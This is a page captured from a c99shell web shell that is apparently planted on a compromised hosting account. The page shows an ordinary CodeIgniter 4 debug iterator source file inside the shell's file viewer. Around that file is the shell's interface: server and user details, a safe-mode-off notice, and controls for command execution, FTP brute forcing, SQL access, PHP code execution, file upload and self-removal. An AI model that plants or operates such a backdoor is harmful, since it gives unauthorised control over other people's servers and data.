smsonayla.org - c99shell

!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: LiteSpeed. PHP/7.4.33 

uname -a: Linux server704.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13
UTC 2025 x86_64
 

uid=1309(necipbey) gid=1314(necipbey) groups=1314(necipbey) 

Safe-mode: OFF (not secure)

/home/necipbey/public_html/system/Debug/   drwxr-xr-x
Free 3433.27 GB of 4265.01 GB (80.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Iterator.php (2.72 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This file is part of CodeIgniter 4 framework.
 *
 * (c) CodeIgniter Foundation <admin@codeigniter.com>
 *
 * For the full copyright and license information, please view
 * the LICENSE file that was distributed with this source code.
 */

namespace CodeIgniter\Debug;

use 
Closure;

/**
 * Iterator for debugging.
 */
class Iterator
{
    
/**
     * Stores the tests that we are to run.
     *
     * @var array
     */
    
protected $tests = [];

    
/**
     * Stores the results of each of the tests.
     *
     * @var array
     */
    
protected $results = [];

    
/**
     * Adds a test to run.
     *
     * Tests are simply closures that the user can define any sequence of
     * things to happen during the test.
     *
     * @return $this
     */
    
public function add(string $nameClosure $closure)
    {
        
$name strtolower($name);

        
$this->tests[$name] = $closure;

        return 
$this;
    }

    
/**
     * Runs through all of the tests that have been added, recording
     * time to execute the desired number of iterations, and the approximate
     * memory usage used during those iterations.
     *
     * @return string|null
     */
    
public function run(int $iterations 1000bool $output true)
    {
        foreach (
$this->tests as $name => $test) {
            
// clear memory before start
            
gc_collect_cycles();

            
$start    microtime(true);
            
$startMem $maxMemory memory_get_usage(true);

            for (
$i 0$i $iterations$i++) {
                
$result    $test();
                
$maxMemory max($maxMemorymemory_get_usage(true));

                unset(
$result);
            }

            
$this->results[$name] = [
                
'time'   => microtime(true) - $start,
                
'memory' => $maxMemory $startMem,
                
'n'      => $iterations,
            ];
        }

        if (
$output) {
            return 
$this->getReport();
        }

        return 
null;
    }

    
/**
     * Get results.
     */
    
public function getReport(): string
    
{
        if (empty(
$this->results)) {
            return 
'No results to display.';
        }

        
helper('number');

        
// Template
        
$tpl '<table>
            <thead>
                <tr>
                    <td>Test</td>
                    <td>Time</td>
                    <td>Memory</td>
                </tr>
            </thead>
            <tbody>
                {rows}
            </tbody>
        </table>'
;

        
$rows '';

        foreach (
$this->results as $name => $result) {
            
$memory number_to_size($result['memory'], 4);

            
$rows .= "<tr>
                <td>
{$name}</td>
                <td>" 
number_format($result['time'], 4) . "</td>
                <td>
{$memory}</td>
            </tr>"
;
        }

        
$tpl str_replace('{rows}'$rows$tpl);

        return 
$tpl '<br/>';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0051 ]--